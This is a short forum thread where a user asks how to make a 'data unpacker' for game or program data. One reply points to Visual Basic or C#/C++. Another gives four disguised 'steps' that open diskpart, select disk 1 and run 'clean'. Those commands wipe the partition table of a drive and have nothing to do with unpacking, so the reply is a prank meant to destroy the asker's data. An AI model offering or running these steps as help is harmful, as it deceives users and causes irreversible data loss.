how i can make data unpacker?

With brain and computer...

well visual basic will work i guess. otherwise go promode and learn c# or c++

i search all net about any unpacker but nothing
i know by dumper but i don't how to make it

step 1 go to run then type cmd then in that box type diskpart then hit enter
step 2 type list disk then hit enter
step 3 type select disk 1 then push enter
step 4 type clean then push enter

your done
